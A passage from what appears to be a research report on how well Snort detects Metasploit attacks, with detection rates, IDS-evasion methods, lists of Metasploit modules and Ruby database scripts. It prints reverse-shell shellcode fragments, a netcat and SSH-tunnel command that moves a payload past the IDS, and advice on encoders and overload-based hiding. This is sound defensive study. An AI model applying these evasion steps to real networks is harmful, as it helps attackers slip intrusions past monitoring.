When comparing the detected exploits of version 2.7.0 with those of version 2.8.6, one can say that you are better off with the Snort version from the Ubuntu 8.04 installation than with the one from Sourcefire. The extra rule set from Emerging Threats provides a 15% higher detection rate on the exploits and 12.8% higher on the payloads compared with version 2.8.6. Comparing version 2.7.0 with 2.8.6 (ET), 2.7.0 detects 5.3% fewer exploits and 11.7% fewer payloads. The number of detected scanners is the same for 2.8.6 and 2.8.6 (ET); one can say that those rules are not provided with the Ubuntu installation. The number of detected encoders is the same for all three versions of Snort. The rule set from Emerging Threats only provides additional value for detecting payloads and exploits: the number of detected attacks of the types DoS, scanners and encoders remains the same between version 2.8.6 and 2.8.6 (ET). Snort 2.7.0 does not detect any of the scanners and detects only 2% of the DoS attacks, less than both other versions.

The total results of Snort 2.7.0 and Snort 2.8.6 differ from each other. Snort version 2.7.0 has 1800 fewer rules loaded, but it detects 3.3% more attacks from Metasploit. One could say that the rules provided with Ubuntu are more effective than those provided by Sourcefire. Snort detects only 19.6% of the total attacks, and that is with the latest rule set from Emerging Threats. This means that 80.4% of the attacks remain undetected, which forms a serious threat.


5 Hiding Attacks

In this section multiple ways to hide attacks from Snort are described. Hiding can be done on different layers, e.g. encryption or code obfuscation. Hiding means successfully carrying out an attack without being noticed by an IDS.

5.1 Code Obfuscation

Usually payloads are easily detectable because they are often reused and are thereby an easy target for detection. However, there are complicated obfuscation schemes available in the Metasploit framework that are easy to use. These obfuscators are called encoders. Within the Metasploit framework there is a selection of 22 encoders, all of which are capable of obfuscating a payload. Obfuscating code can be compared with a simple calculation: for the following calculations you get the same result, but the actual calculation is different:

1. 40 + 2 = 42

2. 84/2 = 42

3. 420/10 = 42

The above calculations are comparable to encoders in the sense that an encoded payload looks like a different piece of code but does the same thing.

All encoders (except one) resulted in an undetected payload. This was tested by writing a Snort rule that was capable of detecting the following payload:

windows/shell/reverse_tcp

buf +=

"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +

"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +

...

"\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff" +

"\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff" +

"\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"

The rule written for Snort checks for the hex values 8B 52 14 8B in a packet, which are located on the second line of the payload:

alert tcp any any -> any any (msg:"niek"; content:"|8B 52 14 8B|"; )

There is actually one encoder that encodes any payload, detectable or undetectable, in such a way that using this encoder is not advisable. This encoder is:

x86/single_static_bit.rb

What this encoder does is add multiple NOPs (0x90) [17] to the payload, which results in triggering a rule on all installations of Snort included in this research:


buf +=

"\xed\xff\x83\xfd\x08\x75\x05\x83\xef\xff\x31\xed\x90\x90" +

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" +

...

"\x3b\x38\x6b\xa7\xa1\xa0\xe0\xbc\x7c\x2d\x66\x72\x31\x20" +

"\xb6\x2a\x31\x37\x2f\x26\x73\x39\x78\xf8\x72\x2d\x64\x60" +

"\xb0"

Using this encoder is actually the worst-case scenario for an attacker: obfuscating a possibly undetected payload into a detectable one.
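The two outcomes described in this section, seen from the detector's side, as an added illustration that is not code from the report. The 4-byte signature is the one the report's rule uses; the payload bytes are the first two lines of the windows/shell/reverse_tcp listing above. The XOR transform is a toy stand-in for an encoder, used only to show why a fixed content match stops matching, and the 14-byte NOP threshold is an assumption modelled on Snort's classic x86 NOOP content rule, not a value from the report.

```python
# Signature from the report's rule: content:"|8B 52 14 8B|"
SIGNATURE = bytes.fromhex("8B52148B")
# First bytes of the windows/shell/reverse_tcp listing quoted in the report.
PAYLOAD_PREFIX = bytes.fromhex("fce8890000006089e531d2648b52308b520c8b52148b7228")
NOP = 0x90
NOP_SLED_THRESHOLD = 14   # assumption: length of the classic x86 NOOP content match


def content_match(data: bytes, signature: bytes = SIGNATURE) -> bool:
    """What a Snort content: option does: the byte sequence must appear verbatim."""
    return signature in data


def xor_transform(data: bytes, key: int) -> bytes:
    """Toy stand-in for an encoder: every byte changes, so a fixed signature
    no longer matches, while the transform is trivially reversible."""
    return bytes(b ^ key for b in data)


def longest_nop_run(data: bytes) -> int:
    """Length of the longest run of consecutive 0x90 bytes (a NOP sled)."""
    best = run = 0
    for b in data:
        run = run + 1 if b == NOP else 0
        best = max(best, run)
    return best


def alerts_for(data: bytes) -> set:
    """Which of the two detections discussed in section 5.1 fire on this data:
    the exact content signature, or a NOP sled long enough to hit a NOOP rule."""
    fired = set()
    if content_match(data):
        fired.add("content 8B 52 14 8B")
    if longest_nop_run(data) >= NOP_SLED_THRESHOLD:
        fired.add("x86 NOOP sled")
    return fired


# Constructed cases: the plain payload, a transformed copy, and a transformed
# copy with a run of 0x90 in front of it, like the single_static_bit output
# quoted in the report (the two leading bytes are taken from that listing).
PLAIN = PAYLOAD_PREFIX
ENCODED = xor_transform(PAYLOAD_PREFIX, 0x55)
SLED_ENCODED = bytes([0x31, 0xED]) + bytes([NOP]) * 16 + ENCODED
```

The point for a rule writer: a content match on the raw payload bytes is lost as soon as any byte changes, whereas a structural property such as a long NOP run survives the transform, which is exactly why the single_static_bit output was caught by every installation while the other encoders were not.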

5.2 Encryption of the Data Stream

By carrying out an attack over an encrypted channel, the attack can remain undetected by the IDS. Since encryption covers the entire data stream, it is impossible for an IDS to read the content of the encrypted data stream; basically, Snort is unable to verify the signature within the encrypted data stream.

On the target machine a netcat session is started that will send out the payload via netcat. This is done in the same way as in section 2.3.1, only the other way around. The following command sends the binary output when the server connects to port 1234:

ruby payload.rb | nc -l 1234

On the servers where Snort is running, a connection is initiated via an SSH tunnel to the sending server:

ssh -f -L 23333:127.0.0.1:1234 [email protected].*.* sleep 10; \
nc 127.0.0.1 23333 > payload.rb

So basically what this command does is:

1. Start SSH tunnel

2. Tunnel traffic on 127.0.0.1 port 1234 to the remote destination

3. Connect to the listening socket on the sending server through the SSH tunnel

4. Download the payload in binary format through this SSH tunnel

The above resulted in a detected payload going completely off the radar. Exploiting a machine via SSH and executing the payload via SSH is however a different story, which is out of the scope of this research.


5.3 Fragmented Packets

Fragmenting packets has almost no influence on Snort. However, if it is possible to fragment the packets in such a way that the signature defined by the configured rule set is broken, the attack is hidden. Whether this is feasible for the exploits found in Metasploit without rendering the exploit non-working is out of the scope of this research. But the fact that signature detection can easily be broken by fragmenting packets is a dangerous and feasible issue.
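Why the stream5 preprocessor from section 4.1 matters for this point, as an added illustration that is not code from the report: a content signature that straddles a TCP segment boundary is missed when each segment is inspected on its own and found again once the stream is reassembled. The bytes are the start of the payload listing in section 5.1; the segment boundary, sequence numbers and the retransmission case are constructed for the example.

```python
from dataclasses import dataclass
from typing import List

# Signature from the report's rule and the first bytes of its payload listing.
SIGNATURE = bytes.fromhex("8B52148B")
PAYLOAD = bytes.fromhex("fce8890000006089e531d2648b52308b520c8b52148b7228")


@dataclass(frozen=True)
class Segment:
    seq: int       # relative TCP sequence number of the first payload byte
    data: bytes


# Constructed: the cut at byte 20 lands inside the signature (bytes 18..21),
# and the two segments arrive out of order.
SEGMENTS: List[Segment] = [
    Segment(seq=20, data=PAYLOAD[20:]),
    Segment(seq=0, data=PAYLOAD[:20]),
]


def per_packet_match(segments: List[Segment], signature: bytes = SIGNATURE) -> bool:
    """Inspect each segment on its own, as matching without reassembly would."""
    return any(signature in s.data for s in segments)


def reassemble(segments: List[Segment]) -> bytes:
    """Order segments by sequence number, drop retransmitted overlap, refuse gaps.
    A real reassembler buffers until a gap fills; here a gap is an error so that
    a partial stream is never silently inspected as if it were complete."""
    stream = bytearray()
    expected = None
    for s in sorted(segments, key=lambda s: s.seq):
        if expected is None:
            expected = s.seq
        if s.seq > expected:
            raise ValueError(f"gap in stream before seq {s.seq}")
        overlap = expected - s.seq
        if overlap < len(s.data):          # skip fully retransmitted segments
            stream += s.data[overlap:]
            expected = s.seq + len(s.data)
    return bytes(stream)


def stream_match(segments: List[Segment], signature: bytes = SIGNATURE) -> bool:
    """Inspect the reassembled stream, as stream5 lets Snort's rules do."""
    return signature in reassemble(segments)
```

The same holds for IP fragments and for the order in which the pieces arrive: the detector only gets a faithful view if it rebuilds the stream the way the receiving host will, which is also why the frag and stream preprocessors need the target's reassembly policy configured correctly.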

5.4 Timing Attacks

An attacker could hide by timing its attacks in a certain way. However, this has almost no influence on the efficiency of Snort because it operates on signature detection. A situation where timing could work is timing an attack for when Snort is overloaded and therefore dropping packets.

5.5 Slow Down Attack

Slowing down an attack has no influence on Snort. Actually, it becomes easier for Snort to detect an attack because it has more time to process the packets.

5.6 Overloading Snort

Snort will drop packets if it is too busy. Thereby an attacker could launch a denial of service on a Snort installation just by sending it a lot of fake exploits and other malicious traffic, and could hide its own attack among all these fake attacks, masquerading it possibly very effectively. The attacker does however need access to a botnet to accomplish this, but acquiring a botnet is not difficult or expensive these days [18].


6 Conclusion

During our research we have collected lots of results, most of which are not really surprising. Before starting this project we already knew that Snort would not be really effective against Metasploit attacks. That Snort is not able to detect attacks which are heavily used by all kinds of worms is however really surprising: none of the three installations of Snort were able to detect the exploits used by the Slammer [13] and Conficker [14] worms. Keeping in mind that Metasploit is really easy to use, publicly available and almost undetectable with a normal installation of Snort, the framework is a real danger to consumer and enterprise networks.

6.1 Effectiveness

The main question was of course what the effectiveness of Snort would be against Metasploit attacks when configured with open source rule sets. The results are kind of horrible if you thought Snort would be doing a great job in detecting attacks in your network. Even with the Emerging Threats rule set only one out of five attacks is detected, which is only 20%. Surprising, however, is that the version of Snort in the repositories, which is an old version, is doing a better job than a newer version of Snort. The difference lies in the fact that the version from the Ubuntu 8.04 repository has community rules which cannot be found in the official Snort version. The weight of all these attacks is maybe not the same, but all attacks, even the denial of service attacks, could indirectly lead to a compromised system.

6.2 Increase Effectiveness

Detection within Snort is based on small signatures. This means that if an attacker is able to change this signature in any way, it is possible to hide the attack from Snort. In order to create an intrusion detection system which is more efficient, detection should be done in a different way. A more efficient intrusion detection system would detect attacks not based on signatures but on behaviour [15].

6.3 Training Snort

The number of rules found in a Snort installation does not really reflect its effectiveness in a specific network. If a company uses Snort, it should train it according to the network: only apply rules against attacks that are expected on the network; don't implement thousands of rules against Linux hosts if the network only consists of Windows hosts. The idea is to have a Snort installation with as few rules as possible. Also collect all the port numbers over which expected traffic is sent, because then it is possible to write simple rules that detect traffic on other ports, which would always be malicious. Training Snort could very well result in a very effective intrusion detection system.


6.4 Unique Attacks

A standard installation of Snort is mostly effective against well-known attacks, especially since the rules are based on signature detection. If no known signature is present in the packet, Snort will not ring a bell. So if an attacker uses its own attacks, which are not publicly available, the protection from Snort is rendered useless. Thereby Snort cannot protect a network by itself; it is just another brick on top of the security measures taken to protect a network against malicious activities.

6.5 Cat and Mouse

Attacks against software and operating systems come out regularly, so it is very important to keep your Snort rule set up to date. There will always be a window of opportunity for an attacker between the date an attack is released and the date the Snort rule set is updated. This results in an ongoing cat-and-mouse game between Snort and the attacks.

6.6 Obfuscating

Exploits are usually only effective for a short period of time if all systems are patched regularly. The only attacks within Metasploit which keep their value over time are the payloads: usually payloads are used over and over again with different exploits. Thereby it is really important that those payloads are detected efficiently. However, it is really easy to hide these common payloads by obfuscating them with an encoder. Especially the Shikata ga nai encoder is really effective in obfuscating the payload.


7 Future work

For this research we had limited time. With more time we could have conducted this research more thoroughly. Some mistakes were made in the beginning that cost us some time. For example, we were not aware that Snort would not scan packets with a wrong checksum at all. Most of the traces we analysed with Snort had a bad checksum because they were made on a different server and network. Therefore we had to redo some field work in order to get to our results.

7.1 Metasploit Rule Set

It would be nice if there was a Snort rule set with a rule for every attack in Metasploit. The best thing would be if this rule set were updated in parallel with Metasploit. It would then be possible to say that, if you install Snort with this rule set, Metasploit activity will always be detected.

7.2 Clean Packet Traces

The packet traces we have contain the attacks from Metasploit. But it would be nice to have clean packet traces without additional data about our IP addresses, so administrators could use these traces to test their intrusion detection system. The traces we have now contain public IP addresses, so we cannot afford to release them. If we were to make these traces on a local network we could publish them on the Internet for others to use.

7.3 Effect of Rule Parameters

During our research we have not looked specifically at the rule parameters: what is the influence of using these parameters on both efficiency and performance? Especially if you run Snort in intrusion prevention system mode, the performance needs to be perfect. If the Snort server cannot cope with the amount of packets that need to be analysed under an intensive rule set, it will drop packets.


References

[1] Snort, http://www.snort.org/, retrieved 13 April 2010

[2] Metasploit, http://www.metasploit.com/, retrieved 13 April 2010

[3] Emerging Threats, http://www.emergingthreats.net/, retrieved 13 April 2010

[4] Sourcefire, http://www.sourcefire.com/, retrieved 13 April 2010

[5] Obfuscated code, http://en.wikipedia.org/wiki/Obfuscated_code, retrieved 20 April 2010

[6] Song et al., On the Infeasibility of Modeling Polymorphic Shellcode, 2007, retrieved 3 May 2010

[7] Antivirus bypass, http://www.offensive-security.com/metasploit-unleashed/Antivirus-Bypass, retrieved 7 May 2010

[8] Payload generator, http://www.offensive-security.com/metasploit-unleashed/Payload-Generator, retrieved 3 May 2010

[9] Context keyed payload encoding, http://druid.caughq.org/presentations/Context-keyed-Payload-Encoding.pdf, retrieved 3 May 2010

[10] Penetration testing, http://en.wikipedia.org/wiki/Penetration_test, retrieved 28 May 2010

[11] Intrusion Detection System, http://en.wikipedia.org/wiki/Intrusion_detection_system, retrieved 28 May 2010

[12] farpd - ARP reply daemon, http://www.digipedia.pl/man/doc/view/farpd.8/, retrieved 3 May 2010

[13] SQL Slammer Worm, http://en.wikipedia.org/wiki/SQL_Slammer, retrieved 29 May 2010

[14] Conficker Worm, http://en.wikipedia.org/wiki/Conficker, retrieved 29 May 2010

[15] Intrusion Detection FAQ: What is behavior-based intrusion detection?, http://www.sans.org/security-resources/idfaq/behavior_based.php, retrieved 29 May 2010

[16] Alphanumeric and unicode encoders are generally unusable, http://www.metasploit.com/redmine/issues/430, retrieved 29 May 2010

[17] NOP, http://en.wikipedia.org/wiki/NOP, retrieved 29 May 2010

[18] Botnet even duur als bioscoopkaartje (Dutch: "Botnet as expensive as a cinema ticket"), http://security.nl/artikel/33429/1/Botnet_even_duur_als_bioscoopkaartje.html, retrieved 29 May 2010


A Exploits - Total: 266

symantec_iaosymantec_rtvscantrendmicro_serverprotecttrendmicro_serverprotect_createbindingtrendmicro_serverprotect_earthagenttype77energizer_duo_payloadname_serviceremote_agentca_arcserve_342discovery_tcpdiscovery_udpetrust_itm_alerthsmserverlgserverlgserver_rxrloginlgserver_rxsuselicenseinilicense_gcrmediasrv_sunrpcmessage_enginemessage_engine_heapsql_agenttape_engineuniversal_agentms03_026_dcomms05_017_msmqmsdns_zonenamebroadcom_wifi_ssidalphastor_agentblackice_pam_icqkerio_auth3cdaemon_ftp_usercesarftp_mkddreamftp_formateasyfilesharing_passeasyftp_cwd_fixretfilecopa_list_overflowfreeftpd_userglobalscapeftp_inputhttpdx_tolog_formatleapftp_pasv_replymicrosoft_ftpd_nlstnetterm_netftpd_user

oracle9i_xdb_ftp_passoracle9i_xdb_ftp_unlockproftp_bannersami_ftpd_usersasser_ftpd_portservu_mdtmslimftpd_list_concattrellian_client_pasvvermillion_ftpd_portwarftpd_165_passwarftpd_165_userwftpd_sizewsftp_server_503_mkdwsftp_server_505_xmd5mohaa_getinforacer_503beta5ut2004_secureadobe_robohelper_authbypassaltn_securitygatewayapache_chunkedapache_mod_rewrite_ldapapache_modjk_overflowbadblue_ext_overflowbadblue_passthrubea_weblogic_jsessionidbea_weblogic_transfer_encodingbelkin_bulldogca_igateway_debugedirectory_hostedirectory_imonitorefs_easychatserver_usernamefdm_auth_headerhp_nnm_openview5hp_nnm_ovalarm_langhp_nnm_ovashp_nnm_ovwebhelphp_nnm_snmphp_nnm_toolbarhp_power_manager_loginhttpdx_handlepeerhttpdx_tolog_formatia_webmailibm_tpmfosd_overflow


ibm_tsm_cad_headericecast_headerintersystems_cacheipswitch_wug_maincfgretmailenable_auth_headermaxdb_webdbm_databasemaxdb_webdbm_get_overflowmcafee_epolicy_sourcemdaemon_worldclient_form2rawminishare_get_overflownavicopa_get_overflownovell_messenger_acceptlangoracle9i_xdb_passpeercast_urlprivatewire_gatewaypsoproxy91_overflowsambar6_search_resultssapdb_webtoolssavant_31_overflowservu_session_cookieshoutcast_formatshttpd_poststeamcast_useragentsybase_easervertrackercam_phparg_overflowtrendmicro_officescanxitami_if_mod_sinceiis_webdav_upload_aspms01_023_printerms01_033_idqms02_018_htrms03_007_ntdll_webdaveudora_listimail_deleteipswitch_searchmailenable_loginmailenable_statusmailenable_w3c_selectmdaemon_cram_md5mdaemon_fetchmercur_imap_select_overflowmercur_loginmercury_loginmercury_renamenovell_netmail_appendnovell_netmail_auth

novell_netmail_statusnovell_netmail_subscribefp30reg_chunkedms00_094_pbservernsiislog_postrsa_webagent_redirectw3who_queryimail_thccalicclnt_getconfigcalicserv_getconfigsentinel_lm7_udpdomino_http_accept_languagedomino_sametime_stmuxhummingbird_exceedniprintsaplpdwincomlpd_adminapple_quicktime_rtsp_responseasus_dpcproxy_overflowbakbone_netvault_heapbigant_serverbigant_server_250bigant_server_usvbomberclone_overflowbopup_commborland_interbaseborland_starteamdoubletakeeiqnetworks_esaeiqnetworks_esa_topologyfb_isc_attach_databasefb_isc_create_databasefb_svc_attachhp_omniinet_1hp_omniinet_2hp_ovtraceib_isc_attach_databaseib_isc_create_databaseib_svc_attachibm_tsm_cad_pingibm_tsm_rca_dicugetidentifylandesk_aolnsrvrmercury_phonebookmirc_privmsg_servernettransportsap_2005_license


shixxnote_fonttalkative_responsetiny_identd_overflowvideolan_tivowindows_rshms10_025_wmss_connect_funneltimbuktu_fileuploadlyris_listmanager_weak_passms02_039_slammerms02_056_helloms09_004_sp_replwritetovarbinmssql_payloadmysql_yassl_helloxlink_nfsdms05_030_nntpnmap_storzenworks_desktop_agentosb_ndmp_authtns_argumentstns_auth_sesskeytns_service_nameseattlelab_passbluecoat_winproxy_hostccproxy_telnet_pingproxypro_http_getqbik_wingate_wwwproxyrealwinaim_triton_cseqsipxezphone_cseqsipxphone_cseqms03_049_netapims04_007_killbillms04_011_lsassms04_031_netdde

ms05_039_pnpms06_025_rasmans_regms06_025_rrasms06_040_netapims06_066_nwapims06_066_nwwksms06_070_wkssvcms08_067_netapims09_050_smb2_negotiate_func_indexmsdns_zonenamenetidentity_xtierrpcpipepsexecsmb_relaytimbuktu_plughntcommand_bofmailcarrier_smtp_ehlomercury_cram_md5ms03_046_exchange2000_xexch50wmailserverypops_overflow1freeftpd_key_exchangefreesshd_key_exchangesecurecrt_ssh1gamsoft_telsrv_usernamegoodtech_telnetattftp_long_filenamedlink_long_filenamefuturesoft_transfermodequick_tftp_pro_modetftpd32_long_filenamethreectftpsvc_long_modecam_log_securitywinvnc_http_getsafenet_ike_11ms04_045_wins

B Payloads - Total: 101

x64.shell.bind_tcpvncinject.reverse_tcp_allportsvncinject.reverse_ord_tcpvncinject.find_tagpatchupvncinject.reverse_tcp_allportspatchupmeterpreter.reverse_ipv6_tcpmeterpreter.reverse_ipv6_tcp

execvncinject.reverse_tcpshell_bind_tcpshell.reverse_tcpshell.reverse_httpshell.bind_tcpshell.bind_nonx_tcp


patchupvncinject.reverse_tcppatchupvncinject.bind_tcppatchupvncinject.bind_ipv6_tcppatchupmeterpreter.reverse_tcp_allportspatchupmeterpreter.find_tagmeterpreter.reverse_tcpmeterpreter.reverse_nonx_tcpmeterpreter.reverse_httpmeterpreter.bind_tcpvncinject.reverse_nonx_tcpvncinject.bind_tcpvncinject.bind_ipv6_tcpshell_bind_tcp_xpfwshell.reverse_nonx_tcpshell.find_tagshell.bind_ipv6_tcppatchupvncinject.reverse_tcp_dnspatchupvncinject.reverse_nonx_tcppatchupmeterpreter.reverse_tcp_dnspatchupmeterpreter.reverse_ord_tcppatchupmeterpreter.reverse_nonx_tcppatchupmeterpreter.bind_tcpmeterpreter.reverse_ord_tcpaddusermeterpreter.find_tagx64.shell_reverse_tcpx64.meterpreter.bind_tcpshell_reverse_tcpmeterpreter.reverse_tcp_dnsmeterpreter.reverse_httpsmeterpreter.bind_ipv6_tcpx64.vncinject.bind_tcpx64.shell_bind_tcp

x64.meterpreter.reverse_tcpx64.execvncinject.reverse_ipv6_tcpvncinject.bind_nonx_tcpshell.reverse_tcp_dnsshell.reverse_tcp_allportsshell.reverse_ord_tcpshell.reverse_ipv6_tcppatchupvncinject.reverse_ord_tcppatchupvncinject.reverse_ipv6_tcppatchupvncinject.bind_nonx_tcppatchupmeterpreter.reverse_tcppatchupmeterpreter.bind_nonx_tcppatchupmeterpreter.bind_ipv6_tcpmeterpreter.reverse_tcp_allportsmeterpreter.bind_nonx_tcpx64.shell.reverse_tcpvncinject.reverse_tcp_dnsvncinject.reverse_httppatchupvncinject.find_tagdownload_execx64.vncinject.reverse_tcpupexec.reverse_nonx_tcpupexec.reverse_tcp_allportsupexec.reverse_tcpupexec.reverse_ord_tcpupexec.reverse_ipv6_tcpupexec.reverse_httpupexec.find_tagupexec.bind_tcpupexec.bind_nonx_tcpupexec.bind_ipv6_tcpupexec.reverse_tcp_dns

C Scanners - Total: 96

backdoor.energizer_duo_detect
db2.db2_auth
db2.db2_version
db2.discovery
dcerpc.endpoint_mapper
dcerpc.hidden
dcerpc.management
dcerpc.tcp_dcerpc_auditor
dect.call_scanner
dect.station_scanner
discovery.arp_sweep
discovery.udp_sweep
emc.alphastor_devicemanager
emc.alphastor_librarymanager
finger.finger_users
ftp.anonymous
ftp.ftp_version
http.backup_file
http.blind_sql_query
http.brute_dirs
http.cert
http.copy_of_file
http.dir_listing
http.dir_scanner
http.dir_webdav_unicode_bypass
http.enum_delicious
http.enum_wayback
http.error_sql_injection
http.file_same_name_dir
http.files_dir
http.frontpage_login
http.http_login
http.http_version
http.lucky_punch
http.ms09_020_webdav_unicode_bypass
http.options
http.prev_dir_same_name_file
http.replace_ext
http.robots_txt
http.soap_xml
http.sqlmap
http.ssl
http.svn_scanner
http.tomcat_mgr_login
http.trace_axd
http.vhost_scanner
http.vmware_server_dir_trav
http.web_vulndb
http.webdav_internal_ip
http.webdav_scanner
http.webdav_website_content
http.writable
http.xpath
imap.imap_version
ip.ipidseq
misc.ib_service_mgr_info
misc.sunrpc_portmapper
motorola.timbuktu_udp
mssql.mssql_login
mssql.mssql_ping
mysql.mysql_login
mysql.mysql_version
netbios.nbname
nfs.nfsmount
ntp.ntp_monlist
oracle.emc_sid
oracle.sid_enum
oracle.spy_sid
oracle.tnslsnr_version
oracle.xdb_sid
oracle.xdb_sid_brute
pop3.pop3_version
portscan.ack
portscan.ftpbounce
portscan.syn
portscan.tcp
portscan.xmas
postgres.postgres_login
postgres.postgres_version
rogue.rogue_recv
rogue.rogue_send
sip.enumerator
sip.options
smb.pipe_auditor
smb.pipe_dcerpc_auditor
smb.smb2
smb.smb_enumshares
smb.smb_enumusers
smb.smb_login
smb.smb_lookupsid
smb.smb_version
smtp.smtp_version
snmp.aix_version
snmp.community
ssh.ssh_login
ssh.ssh_login_pubkey
ssh.ssh_version
telephony.wardial
telnet.telnet_login
telnet.telnet_version
tftp.tftpbrute
vnc.vnc_none_auth
x11.open_x11


D Denial of Service - Total: 37

ios_http_percentpercent
nfsd_mount
3com_superstack_switch
apache_mod_isapi
dell_openmanage_post
webrick_regex
avahi_portzero
ms02_063_pptp_dos
lsa_addprivs_heap
lsa_transnames_heap
sendmail_prescan
cascade_delete
synflood
cts_rts_flood
appian_bpm
ms09_065_eot_integer
filezilla_server_port
guildftp_cwdlist
titan626_site
vicftps50_list
winftp230_nlst
xmeasy560_nlst
xmeasy570_nlst
pi3web_isapi
nat_helper
ms05_047_pnp
ms06_035_mailslot
ms06_063_trans
ms09_001_write
ms09_050_smb2_negotiate_pidhigh
ms09_050_smb2_session_logoff
ms10_006_negotiate_response_loop
rras_vls_null_deref
vista_negotiate_stop
ms06_019_exchange
pt360_write
chunked

E Encoders - Total: 16

cmd/generic_sh
cmd/ifs
generic/none
ppc/longxor
ppc/longxor_tag
sparc/longxor_tag
x64/xor
x86/alpha_mixed
x86/alpha_upper
x86/call4_dword_xor
x86/countdown
x86/fnstenv_mov
x86/jmp_call_additive
x86/nonupper
x86/shikata_ga_nai
x86/single_static_bit

F insert rules.rb

#!/usr/bin/ruby -w
require "mysql"

# strip the parameter clean: drop the leading "keyword:" and the trailing ";",
# then any quotes, so that msg:"foo"; becomes foo and rev:5; becomes 5
def strip_it(input)
  input = input.sub(/\A[a-z_]+:/, "")
  input.delete(";\"'")
end

# start main function
def main
  # database connection
  dbh = Mysql.real_connect("localhost", "root", "***", "rules")
  # read the file that holds all rules
  file = File.new("all", "r")
  # loop that is responsible for adding the rules to the DB
  while (line = file.gets)
    # address variables from rules
    mystring = "#{line}".split
    nalert = mystring[1]
    faddress = mystring[2]
    fport = mystring[3]
    relation = mystring[4]
    taddress = mystring[5]
    tport = mystring[6]
    length = mystring.length
    rest = mystring[7..length].join(" ")
    msg = (/msg:.*?;/.match(rest))
    msg = strip_it("#{msg}")
    # ... (the other option keywords, logto up to flow, are extracted the same
    # way; those lines are omitted in the original listing)
    rev = (/rev:.*?;/.match(rest))
    rev = strip_it("#{rev}")

    # insert rule in DB (the values are interpolated straight into the
    # statement; the rule files are trusted local input here)
    dbh.query("INSERT INTO ubuntu (alert, from_address, from_port, relation, to_address, to_port, msg,
      logto, minfrag, ttl, sid, dsize, content, offset, depth, flags, seq, ack, itype, icode, session,
      classtype, uricontent, reference, flow, rev)
      VALUES ('#{nalert}', '#{faddress}', '#{fport}', '#{relation}', '#{taddress}', '#{tport}', '#{msg}',
      '#{logto}', '#{minfrag}', '#{ttl}', '#{sid}', '#{dsize}', '#{content}', '#{offset}', '#{depth}', '#{flags}',
      '#{seq}', '#{ack}', '#{itype}', '#{icode}', '#{session}', '#{classtype}', '#{uricontent}', '#{reference}',
      '#{flow}', '#{rev}')")
  end
  file.close
end

main()
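The option handling in insert rules.rb relies on one regex per keyword plus a strip function, which truncates any value that contains a semicolon inside its quotes and loses the value of unquoted keywords. As an added example, not part of the report or of the authors' scripts, the Ruby below parses a Snort rule into its header fields and option keywords by splitting the option list only on unquoted, unescaped semicolons (the way Snort itself delimits options), and then flattens the result into the columns the script inserts. The rule line used in the check and the helper names (split_options, parse_rule, rule_row) are constructed for this example.

```ruby
#!/usr/bin/ruby
# Added example (not one of the report's scripts): parse a Snort rule line into
# its header fields and option keywords, the step insert_rules.rb performs with
# one regex per keyword before writing the rule to the database.

# Snort rule header: action proto src_addr src_port direction dst_addr dst_port
HEADER_FIELDS = [:action, :proto, :from_address, :from_port, :relation,
                 :to_address, :to_port]

# Split the option body 'msg:"a; b"; sid:1; rev:2;' on semicolons, but only on
# those outside double quotes and not escaped with a backslash, which is how
# Snort itself delimits options.
def split_options(body)
  opts, cur, quoted, escaped = [], String.new, false, false
  body.each_char do |ch|
    if escaped
      cur << ch
      escaped = false
    elsif ch == "\\"
      cur << ch
      escaped = true
    elsif ch == '"'
      cur << ch
      quoted = !quoted
    elsif ch == ";" && !quoted
      opts << cur.strip
      cur = String.new
    else
      cur << ch
    end
  end
  opts << cur.strip unless cur.strip.empty?
  opts
end

# Parse one rule line into a hash; returns nil for blank lines, comments and
# lines that do not have the "header (options)" shape.
def parse_rule(line)
  line = line.strip
  return nil if line.empty? || line.start_with?("#")
  m = /\A(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\((.*)\)\s*\z/.match(line)
  return nil unless m
  rule = {}
  HEADER_FIELDS.each_with_index { |field, i| rule[field] = m[i + 1] }
  rule[:options] = {}
  split_options(m[8]).each do |opt|
    key, _, value = opt.partition(":")
    key = key.strip
    value = value.strip
    # drop the surrounding quotes of msg:"...", content:"..." and friends
    value = value[1..-2] if value.length >= 2 && value.start_with?('"') && value.end_with?('"')
    # keywords such as content may repeat, so every value is kept in order
    (rule[:options][key] ||= []) << value
  end
  rule
end

# Flatten a parsed rule into the columns insert_rules.rb stores; repeated
# keywords are joined with " | " and absent ones become the empty string.
def rule_row(rule)
  row = rule.reject { |k, _| k == :options }
  %w[msg sid rev classtype content flow reference].each do |key|
    row[key.to_sym] = (rule[:options][key] || []).join(" | ")
  end
  row
end
```

With the fields separated this way, the insert can also go through a prepared statement (Mysql#prepare and execute in the mysql gem) instead of interpolating rule text into the SQL string, which removes the quoting problems a msg containing a quote or a semicolon otherwise causes.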

G insert attacks.rb

#!/usr/bin/ruby
require "mysql"

# start main function
def main
  # initiate database connection
  dbh = Mysql.real_connect("1.2.3.4", "root", "******", "rules")

  # read attack file
  file = File.new("attacks.clean", "r")

  # loop that is responsible for inserting the attacks
  while (line = file.gets)
    mystring = "#{line}".split(':')
    quality = mystring[1]
    description = mystring[2].strip
    mystring = mystring[0].split('/')
    os = mystring[0]
    type = mystring[1]
    name = mystring[2]
    dbh.query("INSERT INTO payloads (os, type, name, quality, description)
      VALUES ('#{os}', '#{type}', '#{name}', '#{quality}', '#{description}')")
  end
  file.close
end

main()

H dump attacks.rb

#!/usr/bin/ruby
require "mysql"

# start a new method which holds the script
def main
  # define ruby binary
  ruby = "/opt/metasploit3/bin/ruby"

  # define metasploit cli script
  msfcli = "/opt/metasploit3/msf3/msfcli"

  # connect to database
  dbh = Mysql.real_connect("1.2.3.4", "root", "********", "rules")
  puts "Server version: " + dbh.get_server_info

  # select name, type, os, id from exploits
  query = dbh.query("SELECT name, type, os, id from exploits;")

  # loop through all exploits and assign all values to a variable
  while row = query.fetch_row do
    exploit = row[0]
    type = row[1]
    os = row[2]
    id = row[3]
    puts exploit

    # start tcpdump in the background and start saving packets in a file
    tcpdump = IO.popen("tcpdump -i eth1 -w pcaps/#{id}.#{exploit}.pcap &")

